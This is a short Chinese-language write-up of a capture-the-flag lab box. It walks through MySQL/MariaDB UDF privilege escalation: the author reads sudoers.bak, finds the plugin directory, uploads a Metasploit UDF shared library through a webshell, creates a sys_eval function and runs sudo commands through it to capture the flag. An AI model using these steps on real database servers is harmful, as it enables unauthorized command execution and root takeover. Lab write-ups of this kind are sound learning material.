说在前面:刚接触提权的菜鸡,这道题折腾了好久,所以想记录下来自己做题的经过。
这台靶机通过前面的web渗透,最后可以拿到数据库信息,因此可以通过数据库udf提权。
udf(User Defined Function)是用户自定义函数,udf就是为了让开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRING(字符型),INTEGER(整型),REAL(实数型)。
定义格式:
CREATE [AGGREGATE] FUNCTION function_name RETURNS {STRING|INTEGER|REAL} SONAME '文件名'
[AGGREATE]是聚集函数的表示,系统定义的聚集函数比如有COUNT()、AVE()、MN()、MAX()、SUM() SONAME 'file’表示这个函数从哪个文件里面引入,而这个文件一般是动态链接库,windows下是dll,linux是so,并且这个文件要在mysql的plugin目录下
先查看/etc目录,看是否有敏感文件,这里查看了sudoers.bak
发现mysql用户属于特权用户(只要拿到mysql权限,就相当于掌握了所有权限)
用之前拿到的信息连数据库
select @@plugin_dir
查看自己的plugin目录在哪里:/usr/lib/mariadb/plugin/
然后将恶意的so文件上传到该目录下
恶意so文件的获取方法:
1、首先用show variables like '%compile%';
命令查看主机架构,以便确认操作系统位数,使用不同的udf脚本
2、kali自带udf脚本,在/usr/share/metasploit-framework/data/exploits/mysql/
目录下,可以复制下来用
上传so文件的方法:
这个网站/var/www/html可写,所以先用蚁剑把so文件上传到网站根目录,再移动到/usr/lib/mariadb/plugin/
cp /var/www/html/udf.so /usr/lib/mariadb/plugin/b3.so
可以看到已经成功将so文件移动到mysql拓展目录
然后创建自定义函数,最后的参数是上传的so文件的文件名
create function sys_eval returns string soname 'b3.so';
sudo提权
select sys_eval('sudo whoami');
拿到flag,至此第一台靶机渗透结束,虽然是一路参考过来的,但还是有点感慨qaq